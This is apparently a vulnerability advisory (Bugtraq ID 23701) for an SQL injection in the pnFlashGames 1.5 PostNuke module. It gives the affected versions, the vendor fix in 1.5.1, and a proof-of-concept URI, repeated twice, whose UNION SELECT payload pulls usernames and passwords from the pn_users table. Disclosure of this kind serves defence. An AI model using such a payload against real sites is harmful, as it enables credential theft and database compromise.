PNFlashGames PostNuke Module Index.PHP SQL Injection Vulnerability
BID:23701
Info
PNFlashGames PostNuke Module Index.PHP SQL Injection Vulnerability
| Bugtraq ID: | 23701 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 28 2007 12:00AM |
| Updated: | May 25 2007 05:11PM |
| Credit: | xoron is credited with the discovery of this vulnerability. |
| Vulnerable: |
pnFlashGames pnFlashGames 1.5 |
| Not Vulnerable: |
pnFlashGames pnFlashGames 1.5.1 |
Discussion
PNFlashGames PostNuke Module Index.PHP SQL Injection Vulnerability
pnFlashGames PostNuke module is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
pnFlashGames 1.5 is vulnerable; other versions may also be affected.
pnFlashGames PostNuke module is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
pnFlashGames 1.5 is vulnerable; other versions may also be affected.
Exploit / POC
PNFlashGames PostNuke Module Index.PHP SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/index.php?module=pnFlashGames&func=view&cid=-1/**/union/**/select/**/0,pn_uname,2,pn_pass,4,5,6,7,8,9,10,11,12,13/**/from/**/pn_users/**/where/**/pn_uid=2/*
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/index.php?module=pnFlashGames&func=view&cid=-1/**/union/**/select/**/0,pn_uname,2,pn_pass,4,5,6,7,8,9,10,11,12,13/**/from/**/pn_users/**/where/**/pn_uid=2/*
Solution / Fix
PNFlashGames PostNuke Module Index.PHP SQL Injection Vulnerability
Solution:
The vendor has released version 1.5.1 to address this issue; please see the reference section for details.
pnFlashGames pnFlashGames 1.5
Solution:
The vendor has released version 1.5.1 to address this issue; please see the reference section for details.
pnFlashGames pnFlashGames 1.5
-
pnFlashGames pnFlashGames Module 1.5.1
http://www.pnflashgames.com/UpDownload-index-req-getit-lid-292.phtml
References
PNFlashGames PostNuke Module Index.PHP SQL Injection Vulnerability
References:
References:
- pnFlashGames update to version 1.5.1 (pnFlashGames)
- Vendor Homepage (pnFlashGames)